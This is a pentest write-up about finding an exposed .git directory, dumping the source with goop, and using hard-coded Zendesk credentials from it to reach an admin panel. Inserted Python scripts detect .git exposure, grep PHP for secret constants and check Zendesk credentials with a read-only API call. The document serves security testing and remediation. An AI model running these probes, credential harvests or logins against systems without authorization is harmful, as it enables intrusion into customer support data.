How an Exposed ‘.git’ Directory Leads to a Zendesk Panel Takeover
In the name of Allah, the Most Gracious, the Most Merciful
Greetings, hackers! In a recent pentest engagement at BugSwagger I discovered an exposed ‘.git’ path that let me take over the admin's Zendesk panel. Join me as I walk through it.
Introduction
This short writeup covers a critical misconfiguration: the web server exposed the application's .git directory. An unauthenticated attacker can retrieve the entire source codebase with a single command and, because that code contains hard-coded credentials, gain full access to the Zendesk panel.
The goop tool dumps the exposed .git directory with a single command:
goop https://uat1-middleware.REDACTED.com/.git
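Before dumping a whole repository it is worth confirming the exposure with two cheap requests. The script below is an added example, not part of the writeup or of goop: it fetches /.git/HEAD and /.git/config and accepts the host only if the bodies parse as real git files, which rules out soft-404 pages that return 200 for every path. The hostname in the usage line is a placeholder.

```python
"""Probe a host for an exposed .git directory before dumping it.

Added example (not from the writeup or the goop tool). Assumes the target
serves the same /.git path the writeup found; the example.com host is a
placeholder.
"""
import re
import urllib.error
import urllib.request

# .git/HEAD is either a symbolic ref or a bare SHA-1 (40 hex) / SHA-256 (64 hex) id.
_HEAD_RE = re.compile(r"^(ref: refs/[\w./-]+|[0-9a-f]{40}|[0-9a-f]{64})\s*$")


def looks_like_git_head(body: str) -> bool:
    """True if body is what git writes to .git/HEAD, not an HTML error page."""
    return bool(_HEAD_RE.match(body.strip()))


def looks_like_git_config(body: str) -> bool:
    """True if body has the [core] section every .git/config starts with."""
    return "[core]" in body and "repositoryformatversion" in body


def git_probe_urls(base_url: str) -> list[str]:
    """Files worth requesting: HEAD (cheap, unambiguous) and config (may leak remotes)."""
    base = base_url.rstrip("/")
    return [f"{base}/.git/HEAD", f"{base}/.git/config"]


def fetch(url: str, timeout: float = 10.0) -> tuple[int, str]:
    """GET url and return (status, first 4 KiB of body); HTTP errors keep their status."""
    req = urllib.request.Request(url, headers={"User-Agent": "git-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""
    except urllib.error.URLError:
        return 0, ""


def is_git_exposed(base_url: str) -> bool:
    """Network check: both files must return 200 AND look like git's own output."""
    head_url, config_url = git_probe_urls(base_url)
    status, body = fetch(head_url)
    if status != 200 or not looks_like_git_head(body):
        return False
    status, body = fetch(config_url)
    return status == 200 and looks_like_git_config(body)


if __name__ == "__main__":
    import sys

    # Placeholder host; pass the real target as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "https://uat1-middleware.example.com"
    print(target, "exposed" if is_git_exposed(target) else "not exposed (or blocked)")
```

Checking HEAD rather than requesting /.git/ itself matters because directory listing is usually disabled; goop and similar tools work the same way, reading HEAD and then walking refs, packfiles and loose objects. The fix on the defending side is to keep the .git directory out of the deployed document root and to deny requests to /.git in the web server configuration.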
The downloaded source code contains a file named zendesk_functions.php that holds sensitive credentials in plain text:
define("ZENDESK_API_USERNAME", "REDACTED@REDACTED.com");
define("ZENDESK_API_PASSWORD", "REDACTED_PASSWORD");
define("ZENDESK_API_URL", "https://yourcompany.zendesk.com/api/v2/tickets.json");
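A dumped tree can be large, so grepping for hard-coded credentials should be systematic, and the first use of any credential you find should be a read-only call that proves access without touching customer data. The script below is an added example, not code from the writeup: it extracts PHP define() constants, flags the ones whose names look like secrets, and derives the least-impact Zendesk endpoint, GET /api/v2/users/me.json (Zendesk's documented "show self" call), from whatever /api/v2/ URL was leaked. The SAMPLE_PHP string is constructed to mirror the leaked file; the writeup redacts the real values.

```python
"""Find hard-coded credentials in a dumped PHP tree and validate them read-only.

Added example, not part of the writeup. SAMPLE_PHP is a constructed stand-in
for the leaked zendesk_functions.php; hostnames and values are placeholders.
"""
import base64
import json
import re
import urllib.error
import urllib.request
from pathlib import Path

# define("NAME", "value") or define('NAME', 'value'); escaped quotes inside values are not handled.
_DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<name>[A-Z0-9_]+)\1\s*,\s*(['"])(?P<value>.*?)\3\s*\)""",
    re.IGNORECASE,
)
# Constant names that usually carry a secret.
_SECRET_HINT = re.compile(r"PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE", re.IGNORECASE)


def find_php_defines(source: str) -> dict[str, str]:
    """Return every string constant declared with define() in a PHP source."""
    return {m.group("name"): m.group("value") for m in _DEFINE_RE.finditer(source)}


def flag_secrets(defines: dict[str, str]) -> dict[str, str]:
    """Keep only constants with a secret-looking name and a non-empty value."""
    return {k: v for k, v in defines.items() if _SECRET_HINT.search(k) and v}


def scan_tree(root: str) -> dict[str, dict[str, str]]:
    """Walk a dumped repository and map each PHP file to the secrets it defines."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        secrets = flag_secrets(find_php_defines(path.read_text(errors="replace")))
        if secrets:
            hits[str(path)] = secrets
    return hits


def zendesk_basic_auth(email: str, password: str) -> str:
    """Zendesk accepts HTTP Basic auth as email:password (or email/token:api_token)."""
    return "Basic " + base64.b64encode(f"{email}:{password}".encode()).decode()


def zendesk_me_url(api_url: str) -> str:
    """Derive the read-only /users/me endpoint from any leaked /api/v2/... URL."""
    base = api_url.split("/api/v2/", 1)[0]
    return base + "/api/v2/users/me.json"


def check_zendesk_creds(api_url: str, email: str, password: str, timeout: float = 10.0):
    """Network check: one GET that cannot modify tickets or users.
    Returns the account role ('end-user', 'agent' or 'admin') on success, None otherwise."""
    req = urllib.request.Request(
        zendesk_me_url(api_url),
        headers={"Authorization": zendesk_basic_auth(email, password),
                 "Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.load(resp).get("user", {}).get("role")
    except (urllib.error.HTTPError, urllib.error.URLError):
        return None


# Constructed stand-in for the leaked file (values are placeholders, not real).
SAMPLE_PHP = """<?php
define("ZENDESK_API_USERNAME", "agent@example.com");
define("ZENDESK_API_PASSWORD", "hunter2");
define("ZENDESK_API_URL", "https://yourcompany.zendesk.com/api/v2/tickets.json");
define("DEBUG", "");
"""

if __name__ == "__main__":
    defines = find_php_defines(SAMPLE_PHP)
    print("secrets:", flag_secrets(defines))
    print("validate with:", zendesk_me_url(defines["ZENDESK_API_URL"]))
    # Only against a tenant you are authorized to test:
    # print(check_zendesk_creds(defines["ZENDESK_API_URL"],
    #                           defines["ZENDESK_API_USERNAME"], defines["ZENDESK_API_PASSWORD"]))
```

The role returned by /users/me is enough to show impact ("admin") in a report; logging into the agent panel, as the writeup goes on to do, gives the screenshot but exposes real ticket data to the tester, so the API check is the safer first step.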
To confirm the credentials I went to https://www.zendesk.com/login/ and logged in with them; as shown below, this gave full admin panel access without any restrictions.